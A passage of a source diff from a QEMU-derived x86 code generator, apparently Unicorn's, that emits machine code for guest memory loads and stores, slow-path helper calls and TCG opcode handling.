tcg_out_modrm_offset(s, OPC_CMP_GvEv + trexw, r1, r0, 0); + + /* Prepare for both the fast path add of the tlb addend, and the slow + path function argument setup. There are two cases worth note: + For 32-bit guest and x86_64 host, MOVL zero-extends the guest address + before the fastpath ADDQ below. For 64-bit guest and x32 host, MOVQ + copies the entire guest address for the slow path, while truncation + for the 32-bit host happens with the fastpath ADDL below. */ + tcg_out_mov(s, ttype, r1, addrlo); + + // Unicorn: fast path if hookmem is not enable + if (!HOOK_EXISTS(s->uc, UC_HOOK_MEM_READ) && !HOOK_EXISTS(s->uc, UC_HOOK_MEM_WRITE)) + tcg_out_opc(s, OPC_JCC_long + JCC_JNE, 0, 0, 0); + else + tcg_out_opc(s, OPC_JMP_long, 0, 0, 0); /* slow_path */ + label_ptr[0] = s->code_ptr; + s->code_ptr += 4; + + if (TARGET_LONG_BITS > TCG_TARGET_REG_BITS) { + /* cmp 4(r0), addrhi */ + tcg_out_modrm_offset(s, OPC_CMP_GvEv, addrhi, r0, 4); + + /* jne slow_path */ + tcg_out_opc(s, OPC_JCC_long + JCC_JNE, 0, 0, 0); + label_ptr[1] = s->code_ptr; + s->code_ptr += 4; + } + + /* TLB Hit. */ + + /* add addend(r0), r1 */ + tcg_out_modrm_offset(s, OPC_ADD_GvEv + hrexw, r1, r0, + offsetof(CPUTLBEntry, addend) - which); +} + +/* + * Record the context of a call to the out of line helper code for the slow path + * for a load or store, so that we can later generate the correct helper code + */ +static void add_qemu_ldst_label(TCGContext *s, bool is_ld, TCGMemOp opc, + TCGReg datalo, TCGReg datahi, + TCGReg addrlo, TCGReg addrhi, + int mem_index, tcg_insn_unit *raddr, + tcg_insn_unit **label_ptr) +{ + TCGLabelQemuLdst *label = new_ldst_label(s); + + label->is_ld = is_ld; + label->opc = opc; + label->datalo_reg = datalo; + label->datahi_reg = datahi; + label->addrlo_reg = addrlo; + label->addrhi_reg = addrhi; + label->mem_index = mem_index; + label->raddr = raddr; + label->label_ptr[0] = label_ptr[0]; + if (TARGET_LONG_BITS > TCG_TARGET_REG_BITS) { + label->label_ptr[1] = label_ptr[1]; + } +} + +/* + * Generate code for the slow path for a load at the end of block + */ +static void tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *l) +{ + TCGMemOp opc = l->opc; + TCGReg data_reg; + tcg_insn_unit **label_ptr = &l->label_ptr[0]; + + /* resolve label address */ + tcg_patch32(label_ptr[0], s->code_ptr - label_ptr[0] - 4); + if (TARGET_LONG_BITS > TCG_TARGET_REG_BITS) { + tcg_patch32(label_ptr[1], s->code_ptr - label_ptr[1] - 4); + } + + if (TCG_TARGET_REG_BITS == 32) { + int ofs = 0; + + tcg_out_st(s, TCG_TYPE_PTR, TCG_AREG0, TCG_REG_ESP, ofs); + ofs += 4; + + tcg_out_st(s, TCG_TYPE_I32, l->addrlo_reg, TCG_REG_ESP, ofs); + ofs += 4; + + if (TARGET_LONG_BITS == 64) { + tcg_out_st(s, TCG_TYPE_I32, l->addrhi_reg, TCG_REG_ESP, ofs); + ofs += 4; + } + + tcg_out_sti(s, TCG_TYPE_I32, TCG_REG_ESP, ofs, l->mem_index); + ofs += 4; + + tcg_out_sti(s, TCG_TYPE_I32, TCG_REG_ESP, ofs, (uintptr_t)l->raddr); + } else { + tcg_out_mov(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[0], TCG_AREG0); + /* The second argument is already loaded with addrlo. */ + tcg_out_movi(s, TCG_TYPE_I32, tcg_target_call_iarg_regs[2], + l->mem_index); + tcg_out_movi(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[3], + (uintptr_t)l->raddr); + } + + tcg_out_call(s, qemu_ld_helpers[opc & ~MO_SIGN]); // qq + + data_reg = l->datalo_reg; + switch (opc & MO_SSIZE) { + case MO_SB: + tcg_out_ext8s(s, data_reg, TCG_REG_EAX, P_REXW); + break; + case MO_SW: + tcg_out_ext16s(s, data_reg, TCG_REG_EAX, P_REXW); + break; +#if TCG_TARGET_REG_BITS == 64 + case MO_SL: + tcg_out_ext32s(s, data_reg, TCG_REG_EAX); + break; +#endif + case MO_UB: + case MO_UW: + /* Note that the helpers have zero-extended to tcg_target_long. */ + case MO_UL: + tcg_out_mov(s, TCG_TYPE_I32, data_reg, TCG_REG_EAX); + break; + case MO_Q: + if (TCG_TARGET_REG_BITS == 64) { + tcg_out_mov(s, TCG_TYPE_I64, data_reg, TCG_REG_RAX); + } else if (data_reg == TCG_REG_EDX) { + /* xchg %edx, %eax */ + tcg_out_opc(s, OPC_XCHG_ax_r32 + TCG_REG_EDX, 0, 0, 0); + tcg_out_mov(s, TCG_TYPE_I32, l->datahi_reg, TCG_REG_EAX); + } else { + tcg_out_mov(s, TCG_TYPE_I32, data_reg, TCG_REG_EAX); + tcg_out_mov(s, TCG_TYPE_I32, l->datahi_reg, TCG_REG_EDX); + } + break; + default: + tcg_abort(); + } + + /* Jump to the code corresponding to next IR of qemu_st */ + tcg_out_jmp(s, l->raddr); +} + +/* + * Generate code for the slow path for a store at the end of block + */ +static void tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *l) +{ + TCGMemOp opc = l->opc; + TCGMemOp s_bits = opc & MO_SIZE; + tcg_insn_unit **label_ptr = &l->label_ptr[0]; + TCGReg retaddr; + + /* resolve label address */ + tcg_patch32(label_ptr[0], s->code_ptr - label_ptr[0] - 4); + if (TARGET_LONG_BITS > TCG_TARGET_REG_BITS) { + tcg_patch32(label_ptr[1], s->code_ptr - label_ptr[1] - 4); + } + + if (TCG_TARGET_REG_BITS == 32) { + int ofs = 0; + + tcg_out_st(s, TCG_TYPE_PTR, TCG_AREG0, TCG_REG_ESP, ofs); + ofs += 4; + + tcg_out_st(s, TCG_TYPE_I32, l->addrlo_reg, TCG_REG_ESP, ofs); + ofs += 4; + + if (TARGET_LONG_BITS == 64) { + tcg_out_st(s, TCG_TYPE_I32, l->addrhi_reg, TCG_REG_ESP, ofs); + ofs += 4; + } + + tcg_out_st(s, TCG_TYPE_I32, l->datalo_reg, TCG_REG_ESP, ofs); + ofs += 4; + + if (s_bits == MO_64) { + tcg_out_st(s, TCG_TYPE_I32, l->datahi_reg, TCG_REG_ESP, ofs); + ofs += 4; + } + + tcg_out_sti(s, TCG_TYPE_I32, TCG_REG_ESP, ofs, l->mem_index); + ofs += 4; + + retaddr = TCG_REG_EAX; + tcg_out_movi(s, TCG_TYPE_I32, retaddr, (uintptr_t)l->raddr); + tcg_out_st(s, TCG_TYPE_I32, retaddr, TCG_REG_ESP, ofs); + } else { + tcg_out_mov(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[0], TCG_AREG0); + /* The second argument is already loaded with addrlo. */ + tcg_out_mov(s, (s_bits == MO_64 ? TCG_TYPE_I64 : TCG_TYPE_I32), + tcg_target_call_iarg_regs[2], l->datalo_reg); + tcg_out_movi(s, TCG_TYPE_I32, tcg_target_call_iarg_regs[3], + l->mem_index); + + if (ARRAY_SIZE(tcg_target_call_iarg_regs) > 4) { + retaddr = tcg_target_call_iarg_regs[4]; + tcg_out_movi(s, TCG_TYPE_PTR, retaddr, (uintptr_t)l->raddr); + } else { + retaddr = TCG_REG_RAX; + tcg_out_movi(s, TCG_TYPE_PTR, retaddr, (uintptr_t)l->raddr); + tcg_out_st(s, TCG_TYPE_PTR, retaddr, TCG_REG_ESP, + TCG_TARGET_CALL_STACK_OFFSET); + } + } + + /* "Tail call" to the helper, with the return address back inline. */ + tcg_out_push(s, retaddr); + tcg_out_jmp(s, qemu_st_helpers[opc]); +} +#elif defined(__x86_64__) && defined(__linux__) +# include +# include + +int arch_prctl(int code, unsigned long addr); + +static inline void setup_guest_base_seg(TCGContext *s) +{ + if (arch_prctl(ARCH_SET_GS, GUEST_BASE) == 0) { + s->guest_base_flags = P_GS; + } +} +#else +static inline void setup_guest_base_seg(TCGContext *s) { } +#endif /* SOFTMMU */ + +static void tcg_out_qemu_ld_direct(TCGContext *s, TCGReg datalo, TCGReg datahi, + TCGReg base, intptr_t ofs, int seg, + TCGMemOp memop) +{ + const TCGMemOp real_bswap = memop & MO_BSWAP; + TCGMemOp bswap = real_bswap; + int movop = OPC_MOVL_GvEv; + + if (s->have_movbe && real_bswap) { + bswap = 0; + movop = OPC_MOVBE_GyMy; + } + + switch (memop & MO_SSIZE) { + case MO_UB: + tcg_out_modrm_offset(s, OPC_MOVZBL + seg, datalo, base, ofs); + break; + case MO_SB: + tcg_out_modrm_offset(s, OPC_MOVSBL + P_REXW + seg, datalo, base, ofs); + break; + case MO_UW: + tcg_out_modrm_offset(s, OPC_MOVZWL + seg, datalo, base, ofs); + if (real_bswap) { + tcg_out_rolw_8(s, datalo); + } + break; + case MO_SW: + if (real_bswap) { + if (s->have_movbe) { + tcg_out_modrm_offset(s, OPC_MOVBE_GyMy + P_DATA16 + seg, + datalo, base, ofs); + } else { + tcg_out_modrm_offset(s, OPC_MOVZWL + seg, datalo, base, ofs); + tcg_out_rolw_8(s, datalo); + } + tcg_out_modrm(s, OPC_MOVSWL + P_REXW, datalo, datalo); + } else { + tcg_out_modrm_offset(s, OPC_MOVSWL + P_REXW + seg, + datalo, base, ofs); + } + break; + case MO_UL: + tcg_out_modrm_offset(s, movop + seg, datalo, base, ofs); + if (bswap) { + tcg_out_bswap32(s, datalo); + } + break; +#if TCG_TARGET_REG_BITS == 64 + case MO_SL: + if (real_bswap) { + tcg_out_modrm_offset(s, movop + seg, datalo, base, ofs); + if (bswap) { + tcg_out_bswap32(s, datalo); + } + tcg_out_ext32s(s, datalo, datalo); + } else { + tcg_out_modrm_offset(s, OPC_MOVSLQ + seg, datalo, base, ofs); + } + break; +#endif + case MO_Q: + if (TCG_TARGET_REG_BITS == 64) { + tcg_out_modrm_offset(s, movop + P_REXW + seg, datalo, base, ofs); + if (bswap) { + tcg_out_bswap64(s, datalo); + } + } else { + if (real_bswap) { + int t = datalo; + datalo = datahi; + datahi = t; + } + if (base != datalo) { + tcg_out_modrm_offset(s, movop + seg, datalo, base, ofs); + tcg_out_modrm_offset(s, movop + seg, datahi, base, ofs + 4); + } else { + tcg_out_modrm_offset(s, movop + seg, datahi, base, ofs + 4); + tcg_out_modrm_offset(s, movop + seg, datalo, base, ofs); + } + if (bswap) { + tcg_out_bswap32(s, datalo); + tcg_out_bswap32(s, datahi); + } + } + break; + default: + tcg_abort(); + } +} + +/* XXX: qemu_ld and qemu_st could be modified to clobber only EDX and + EAX. It will be useful once fixed registers globals are less + common. */ +static void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args, bool is64) +{ + TCGReg datalo, datahi, addrlo; + TCGReg addrhi QEMU_UNUSED_VAR; + TCGMemOp opc; +#if defined(CONFIG_SOFTMMU) + int mem_index; + TCGMemOp s_bits; + tcg_insn_unit *label_ptr[2]; +#endif + + datalo = *args++; + datahi = (TCG_TARGET_REG_BITS == 32 && is64 ? *args++ : 0); + addrlo = *args++; + addrhi = (TARGET_LONG_BITS > TCG_TARGET_REG_BITS ? *args++ : 0); + opc = *args++; + +#if defined(CONFIG_SOFTMMU) + mem_index = *args++; + s_bits = opc & MO_SIZE; + + tcg_out_tlb_load(s, addrlo, addrhi, mem_index, s_bits, + label_ptr, offsetof(CPUTLBEntry, addr_read)); + + /* TLB Hit. */ + tcg_out_qemu_ld_direct(s, datalo, datahi, TCG_REG_L1, 0, 0, opc); + + /* Record the current context of a load into ldst label */ + add_qemu_ldst_label(s, true, opc, datalo, datahi, addrlo, addrhi, + mem_index, s->code_ptr, label_ptr); +#else + { + int32_t offset = GUEST_BASE; + TCGReg base = addrlo; + int seg = 0; + + /* ??? We assume all operations have left us with register contents + that are zero extended. So far this appears to be true. If we + want to enforce this, we can either do an explicit zero-extension + here, or (if GUEST_BASE == 0, or a segment register is in use) + use the ADDR32 prefix. For now, do nothing. */ + if (GUEST_BASE && s->guest_base_flags) { + seg = s->guest_base_flags; + offset = 0; + } else if (TCG_TARGET_REG_BITS == 64 && offset != GUEST_BASE) { + tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_L1, GUEST_BASE); + tgen_arithr(s, ARITH_ADD + P_REXW, TCG_REG_L1, base); + base = TCG_REG_L1; + offset = 0; + } + + tcg_out_qemu_ld_direct(s, datalo, datahi, base, offset, seg, opc); + } +#endif +} + +static void tcg_out_qemu_st_direct(TCGContext *s, TCGReg datalo, TCGReg datahi, + TCGReg base, intptr_t ofs, int seg, + TCGMemOp memop) +{ + /* ??? Ideally we wouldn't need a scratch register. For user-only, + we could perform the bswap twice to restore the original value + instead of moving to the scratch. But as it is, the L constraint + means that TCG_REG_L0 is definitely free here. */ + const TCGReg scratch = TCG_REG_L0; + const TCGMemOp real_bswap = memop & MO_BSWAP; + TCGMemOp bswap = real_bswap; + int movop = OPC_MOVL_EvGv; + + if (s->have_movbe && real_bswap) { + bswap = 0; + movop = OPC_MOVBE_MyGy; + } + + switch (memop & MO_SIZE) { + case MO_8: + /* In 32-bit mode, 8-bit stores can only happen from [abcd]x. + Use the scratch register if necessary. */ + if (TCG_TARGET_REG_BITS == 32 && datalo >= 4) { + tcg_out_mov(s, TCG_TYPE_I32, scratch, datalo); + datalo = scratch; + } + tcg_out_modrm_offset(s, OPC_MOVB_EvGv + P_REXB_R + seg, + datalo, base, ofs); + break; + case MO_16: + if (bswap) { + tcg_out_mov(s, TCG_TYPE_I32, scratch, datalo); + tcg_out_rolw_8(s, scratch); + datalo = scratch; + } + tcg_out_modrm_offset(s, movop + P_DATA16 + seg, datalo, base, ofs); + break; + case MO_32: + if (bswap) { + tcg_out_mov(s, TCG_TYPE_I32, scratch, datalo); + tcg_out_bswap32(s, scratch); + datalo = scratch; + } + tcg_out_modrm_offset(s, movop + seg, datalo, base, ofs); + break; + case MO_64: + if (TCG_TARGET_REG_BITS == 64) { + if (bswap) { + tcg_out_mov(s, TCG_TYPE_I64, scratch, datalo); + tcg_out_bswap64(s, scratch); + datalo = scratch; + } + tcg_out_modrm_offset(s, movop + P_REXW + seg, datalo, base, ofs); + } else if (bswap) { + tcg_out_mov(s, TCG_TYPE_I32, scratch, datahi); + tcg_out_bswap32(s, scratch); + tcg_out_modrm_offset(s, OPC_MOVL_EvGv + seg, scratch, base, ofs); + tcg_out_mov(s, TCG_TYPE_I32, scratch, datalo); + tcg_out_bswap32(s, scratch); + tcg_out_modrm_offset(s, OPC_MOVL_EvGv + seg, scratch, base, ofs+4); + } else { + if (real_bswap) { + int t = datalo; + datalo = datahi; + datahi = t; + } + tcg_out_modrm_offset(s, movop + seg, datalo, base, ofs); + tcg_out_modrm_offset(s, movop + seg, datahi, base, ofs+4); + } + break; + default: + tcg_abort(); + } +} + +static void tcg_out_qemu_st(TCGContext *s, const TCGArg *args, bool is64) +{ + TCGReg datalo, datahi, addrlo; + TCGReg addrhi QEMU_UNUSED_VAR; + TCGMemOp opc; +#if defined(CONFIG_SOFTMMU) + int mem_index; + TCGMemOp s_bits; + tcg_insn_unit *label_ptr[2]; +#endif + + datalo = *args++; + datahi = (TCG_TARGET_REG_BITS == 32 && is64 ? *args++ : 0); + addrlo = *args++; + addrhi = (TARGET_LONG_BITS > TCG_TARGET_REG_BITS ? *args++ : 0); + opc = *args++; + +#if defined(CONFIG_SOFTMMU) + mem_index = *args++; + s_bits = opc & MO_SIZE; + + tcg_out_tlb_load(s, addrlo, addrhi, mem_index, s_bits, + label_ptr, offsetof(CPUTLBEntry, addr_write)); + + /* TLB Hit. */ + tcg_out_qemu_st_direct(s, datalo, datahi, TCG_REG_L1, 0, 0, opc); + + /* Record the current context of a store into ldst label */ + add_qemu_ldst_label(s, false, opc, datalo, datahi, addrlo, addrhi, + mem_index, s->code_ptr, label_ptr); +#else + { + int32_t offset = GUEST_BASE; + TCGReg base = addrlo; + int seg = 0; + + /* ??? We assume all operations have left us with register contents + that are zero extended. So far this appears to be true. If we + want to enforce this, we can either do an explicit zero-extension + here, or (if GUEST_BASE == 0, or a segment register is in use) + use the ADDR32 prefix. For now, do nothing. */ + if (GUEST_BASE && s->guest_base_flags) { + seg = s->guest_base_flags; + offset = 0; + } else if (TCG_TARGET_REG_BITS == 64 && offset != GUEST_BASE) { + tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_L1, GUEST_BASE); + tgen_arithr(s, ARITH_ADD + P_REXW, TCG_REG_L1, base); + base = TCG_REG_L1; + offset = 0; + } + + tcg_out_qemu_st_direct(s, datalo, datahi, base, offset, seg, opc); + } +#endif +} + +static inline void tcg_out_op(TCGContext *s, TCGOpcode opc, + const TCGArg *args, const int *const_args) +{ + int c, vexop, rexw = 0; + +#if TCG_TARGET_REG_BITS == 64 +# define OP_32_64(x) \ + case glue(glue(INDEX_op_, x), _i64): \ + rexw = P_REXW; /* FALLTHRU */ \ + case glue(glue(INDEX_op_, x), _i32) +#else +# define OP_32_64(x) \ + case glue(glue(INDEX_op_, x), _i32) +#endif + + switch(opc) { + case INDEX_op_exit_tb: + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_EAX, args[0]); + tcg_out_jmp(s, s->tb_ret_addr); + break; + case INDEX_op_goto_tb: + if (s->tb_jmp_offset) { + /* direct jump method */ + tcg_out8(s, OPC_JMP_long); /* jmp im */ + s->tb_jmp_offset[args[0]] = tcg_current_code_size(s); + tcg_out32(s, 0); + } else { + /* indirect jump method */ + tcg_out_modrm_offset(s, OPC_GRP5, EXT5_JMPN_Ev, -1, + (intptr_t)(s->tb_next + args[0])); + } + s->tb_next_offset[args[0]] = tcg_current_code_size(s); + break; + case INDEX_op_br: + tcg_out_jxx(s, JCC_JMP, args[0], 0); + break; + OP_32_64(ld8u): + /* Note that we can ignore REXW for the zero-extend to 64-bit. */ + tcg_out_modrm_offset(s, OPC_MOVZBL, args[0], args[1], args[2]); + break; + OP_32_64(ld8s): + tcg_out_modrm_offset(s, OPC_MOVSBL + rexw, args[0], args[1], args[2]); + break; + OP_32_64(ld16u): + /* Note that we can ignore REXW for the zero-extend to 64-bit. */ + tcg_out_modrm_offset(s, OPC_MOVZWL, args[0], args[1], args[2]); + break; + OP_32_64(ld16s): + tcg_out_modrm_offset(s, OPC_MOVSWL + rexw, args[0], args[1], args[2]); + break; +#if TCG_TARGET_REG_BITS == 64 + case INDEX_op_ld32u_i64: +#endif + case INDEX_op_ld_i32: + tcg_out_ld(s, TCG_TYPE_I32, args[0], args[1], args[2]); + break; + + OP_32_64(st8): + if (const_args[0]) { + tcg_out_modrm_offset(s, OPC_MOVB_EvIz, + 0, args[1], args[2]); + tcg_out8(s, args[0]); + } else { + tcg_out_modrm_offset(s, OPC_MOVB_EvGv | P_REXB_R, + args[0], args[1], args[2]); + } + break; + OP_32_64(st16): + if (const_args[0]) { + tcg_out_modrm_offset(s, OPC_MOVL_EvIz | P_DATA16, + 0, args[1], args[2]); + tcg_out16(s, args[0]); + } else { + tcg_out_modrm_offset(s, OPC_MOVL_EvGv | P_DATA16, + args[0], args[1], args[2]); + } + break; +#if TCG_TARGET_REG_BITS == 64 + case INDEX_op_st32_i64: +#endif + case INDEX_op_st_i32: + if (const_args[0]) { + tcg_out_modrm_offset(s, OPC_MOVL_EvIz, 0, args[1], args[2]); + tcg_out32(s, args[0]); + } else { + tcg_out_st(s, TCG_TYPE_I32, args[0], args[1], args[2]); + } + break; + + OP_32_64(add): + /* For 3-operand addition, use LEA. */ + if (args[0] != args[1]) { + TCGArg a0 = args[0], a1 = args[1], a2 = args[2], c3 = 0; + + if (const_args[2]) { + c3 = a2, a2 = -1; + } else if (a0 == a2) { + /* Watch out for dest = src + dest, since we've removed + the matching constraint on the add. */ + tgen_arithr(s, ARITH_ADD + rexw, a0, a1); + break; + } + + tcg_out_modrm_sib_offset(s, OPC_LEA + rexw, a0, a1, a2, 0, c3); + break; + } + c = ARITH_ADD; + goto gen_arith; + OP_32_64(sub): + c = ARITH_SUB; + goto gen_arith; + OP_32_64(and): + c = ARITH_AND; + goto gen_arith; + OP_32_64(or): + c = ARITH_OR; + goto gen_arith; + OP_32_64(xor): + c = ARITH_XOR; + goto gen_arith; + gen_arith: + if (const_args[2]) { + tgen_arithi(s, c + rexw, args[0], args[2], 0); + } else { + tgen_arithr(s, c + rexw, args[0], args[2]); + } + break; + + OP_32_64(andc): + if (const_args[2]) { + tcg_out_mov(s, rexw ? TCG_TYPE_I64 : TCG_TYPE_I32, + args[0], args[1]); + tgen_arithi(s, ARITH_AND + rexw, args[0], ~args[2], 0); + } else { + tcg_out_vex_modrm(s, OPC_ANDN + rexw, args[0], args[2], args[1]); + } + break; + + OP_32_64(mul): + if (const_args[2]) { + int32_t val; + val = args[2]; + if (val == (int8_t)val) { + tcg_out_modrm(s, OPC_IMUL_GvEvIb + rexw, args[0], args[0]); + tcg_out8(s, val); + } else { + tcg_out_modrm(s, OPC_IMUL_GvEvIz + rexw, args[0], args[0]); + tcg_out32(s, val); + } + } else { + tcg_out_modrm(s, OPC_IMUL_GvEv + rexw, args[0], args[2]); + } + break; + + OP_32_64(div2): + tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_IDIV, args[4]); + break; + OP_32_64(divu2): + tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_DIV, args[4]); + break; + + OP_32_64(shl): + c = SHIFT_SHL; + vexop = OPC_SHLX; + goto gen_shift_maybe_vex; + OP_32_64(shr): + c = SHIFT_SHR; + vexop = OPC_SHRX; + goto gen_shift_maybe_vex; + OP_32_64(sar): + c = SHIFT_SAR; + vexop = OPC_SARX; + goto gen_shift_maybe_vex; + OP_32_64(rotl): + c = SHIFT_ROL; + goto gen_shift; + OP_32_64(rotr): + c = SHIFT_ROR; + goto gen_shift; + gen_shift_maybe_vex: + if (have_bmi2 && !const_args[2]) { + tcg_out_vex_modrm(s, vexop + rexw, args[0], args[2], args[1]); + break; + } + /* FALLTHRU */ + gen_shift: + if (const_args[2]) { + tcg_out_shifti(s, c + rexw, args[0], args[2]); + } else { + tcg_out_modrm(s, OPC_SHIFT_cl + rexw, c, args[0]); + } + break; + + case INDEX_op_brcond_i32: + tcg_out_brcond32(s, args[2], args[0], args[1], const_args[1], + args[3], 0); + break; + case INDEX_op_setcond_i32: + tcg_out_setcond32(s, args[3], args[0], args[1], + args[2], const_args[2]); + break; + case INDEX_op_movcond_i32: + tcg_out_movcond32(s, args[5], args[0], args[1], + args[2], const_args[2], args[3]); + break; + + OP_32_64(bswap16): + tcg_out_rolw_8(s, args[0]); + break; + OP_32_64(bswap32): + tcg_out_bswap32(s, args[0]); + break; + + OP_32_64(neg): + tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_NEG, args[0]); + break; + OP_32_64(not): + tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_NOT, args[0]); + break; + + OP_32_64(ext8s): + tcg_out_ext8s(s, args[0], args[1], rexw); + break; + OP_32_64(ext16s): + tcg_out_ext16s(s, args[0], args[1], rexw); + break; + OP_32_64(ext8u): + tcg_out_ext8u(s, args[0], args[1]); + break; + OP_32_64(ext16u): + tcg_out_ext16u(s, args[0], args[1]); + break; + + case INDEX_op_qemu_ld_i32: + tcg_out_qemu_ld(s, args, 0); + break; + case INDEX_op_qemu_ld_i64: + tcg_out_qemu_ld(s, args, 1); + break; + case INDEX_op_qemu_st_i32: + tcg_out_qemu_st(s, args, 0); + break; + case INDEX_op_qemu_st_i64: + tcg_out_qemu_st(s, args, 1); + break; + + OP_32_64(mulu2): + tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_MUL, args[3]); + break; + OP_32_64(muls2): + tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_IMUL, args[3]); + break; + OP_32_64(add2): + if (const_args[4]) { + tgen_arithi(s, ARITH_ADD + rexw, args[0], args[4], 1); + } else { + tgen_arithr(s, ARITH_ADD + rexw, args[0], args[4]); + } + if (const_args[5]) { + tgen_arithi(s, ARITH_ADC + rexw, args[1], args[5], 1); + } else { + tgen_arithr(s, ARITH_ADC + rexw, args[1], args[5]); + } + break; + OP_32_64(sub2): + if (const_args[4]) { + tgen_arithi(s, ARITH_SUB + rexw, args[0], args[4], 1); + } else { + tgen_arithr(s, ARITH_SUB + rexw, args[0], args[4]); + } + if (const_args[5]) { + tgen_arithi(s, ARITH_SBB + rexw, args[1], args[5], 1); + } else { + tgen_arithr(s, ARITH_SBB + rexw, args[1], args[5]); + } + break; + +#if TCG_TARGET_REG_BITS == 32 + case INDEX_op_brcond2_i32: + tcg_out_brcond2(s, args, const_args, 0); + break; + case INDEX_op_setcond2_i32: + tcg_out_setcond2(s, args, const_args); + break; +#else /* TCG_TARGET_REG_BITS == 64 */ + case INDEX_op_ld32s_i64: + tcg_out_modrm_offset(s, OPC_MOVSLQ, args[0], args[1], args[2]); + break; + case INDEX_op_ld_i64: + tcg_out_ld(s, TCG_TYPE_I64, args[0], args[1], args[2]); + break; + case INDEX_op_st_i64: + if (const_args[0]) { + tcg_out_modrm_offset(s, OPC_MOVL_EvIz | P_REXW, + 0, args[1], args[2]); + tcg_out32(s, args[0]); + } else { + tcg_out_st(s, TCG_TYPE_I64, args[0], args[1], args[2]); + } + break; + + case INDEX_op_brcond_i64: + tcg_out_brcond64(s, args[2], args[0], args[1], const_args[1], + args[3], 0); + break; + case INDEX_op_setcond_i64: + tcg_out_setcond64(s, args[3], args[0], args[1], + args[2], const_args[2]); + break; + case INDEX_op_movcond_i64: + tcg_out_movcond64(s, args[5], args[0], args[1], + args[2], const_args[2], args[3]); + break; + + case INDEX_op_bswap64_i64: + tcg_out_bswap64(s, args[0]); + break; + case INDEX_op_ext32u_i64: + tcg_out_ext32u(s, args[0], args[1]); + break; + case INDEX_op_ext32s_i64: + tcg_out_ext32s(s, args[0], args[1]); + break; +#endif + + OP_32_64(deposit): + if (args[3] == 0 && args[4] == 8) { + /* load bits 0..7 */ + tcg_out_modrm(s, OPC_MOVB_EvGv | P_REXB_R | P_REXB_RM, + args[2], args[0]); + } else if (args[3] == 8 && args[4] == 8) { + /* load bits 8..15 */ + tcg_out_modrm(s, OPC_MOVB_EvGv, args[2], args[0] + 4); + } else if (args[3] == 0 && args[4] == 16) { + /* load bits 0..15 */ + tcg_out_modrm(s, OPC_MOVL_EvGv | P_DATA16, args[2], args[0]); + } else { + tcg_abort(); + } + break; + + case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ + case INDEX_op_mov_i64: + case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ + case INDEX_op_movi_i64: + case INDEX_op_call: /* Always emitted via tcg_out_call. */ + default: + tcg_abort(); + } + +#undef OP_32_64 +} + +static const TCGTargetOpDef x86_op_defs[] = { + { INDEX_op_exit_tb, { NULL } }, + { INDEX_op_goto_tb, { NULL } }, + { INDEX_op_br, { NULL } }, + { INDEX_op_ld8u_i32, { "r", "r" } }, + { INDEX_op_ld8s_i32, { "r", "r" } }, + { INDEX_op_ld16u_i32, { "r", "r" } }, + { INDEX_op_ld16s_i32, { "r", "r" } }, + { INDEX_op_ld_i32, { "r", "r" } }, + { INDEX_op_st8_i32, { "qi", "r" } }, + { INDEX_op_st16_i32, { "ri", "r" } }, + { INDEX_op_st_i32, { "ri", "r" } }, + + { INDEX_op_add_i32, { "r", "r", "ri" } }, + { INDEX_op_sub_i32, { "r", "0", "ri" } }, + { INDEX_op_mul_i32, { "r", "0", "ri" } }, + { INDEX_op_div2_i32, { "a", "d", "0", "1", "r" } }, + { INDEX_op_divu2_i32, { "a", "d", "0", "1", "r" } }, + { INDEX_op_and_i32, { "r", "0", "ri" } }, + { INDEX_op_or_i32, { "r", "0", "ri" } }, + { INDEX_op_xor_i32, { "r", "0", "ri" } }, + { INDEX_op_andc_i32, { "r", "r", "ri" } }, + + { INDEX_op_shl_i32, { "r", "0", "Ci" } }, + { INDEX_op_shr_i32, { "r", "0", "Ci" } }, + { INDEX_op_sar_i32, { "r", "0", "Ci" } }, + { INDEX_op_rotl_i32, { "r", "0", "ci" } }, + { INDEX_op_rotr_i32, { "r", "0", "ci" } }, + + { INDEX_op_brcond_i32, { "r", "ri" } }, + + { INDEX_op_bswap16_i32, { "r", "0" } }, + { INDEX_op_bswap32_i32, { "r", "0" } }, + + { INDEX_op_neg_i32, { "r", "0" } }, + + { INDEX_op_not_i32, { "r", "0" } }, + + { INDEX_op_ext8s_i32, { "r", "q" } }, + { INDEX_op_ext16s_i32, { "r", "r" } }, + { INDEX_op_ext8u_i32, { "r", "q" } }, + { INDEX_op_ext16u_i32, { "r", "r" } }, + + { INDEX_op_setcond_i32, { "q", "r", "ri" } }, + + { INDEX_op_deposit_i32, { "Q", "0", "Q" } }, + { INDEX_op_movcond_i32, { "r", "r", "ri", "r", "0" } }, + + { INDEX_op_mulu2_i32, { "a", "d", "a", "r" } }, + { INDEX_op_muls2_i32, { "a", "d", "a", "r" } }, + { INDEX_op_add2_i32, { "r", "r", "0", "1", "ri", "ri" } }, + { INDEX_op_sub2_i32, { "r", "r", "0", "1", "ri", "ri" } }, + +#if TCG_TARGET_REG_BITS == 32 + { INDEX_op_brcond2_i32, { "r", "r", "ri", "ri" } }, + { INDEX_op_setcond2_i32, { "r", "r", "r", "ri", "ri" } }, +#else + { INDEX_op_ld8u_i64, { "r", "r" } }, + { INDEX_op_ld8s_i64, { "r", "r" } }, + { INDEX_op_ld16u_i64, { "r", "r" } }, + { INDEX_op_ld16s_i64, { "r", "r" } }, + { INDEX_op_ld32u_i64, { "r", "r" } }, + { INDEX_op_ld32s_i64, { "r", "r" } }, + { INDEX_op_ld_i64, { "r", "r" } }, + { INDEX_op_st8_i64, { "ri", "r" } }, + { INDEX_op_st16_i64, { "ri", "r" } }, + { INDEX_op_st32_i64, { "ri", "r" } }, + { INDEX_op_st_i64, { "re", "r" } }, + + { 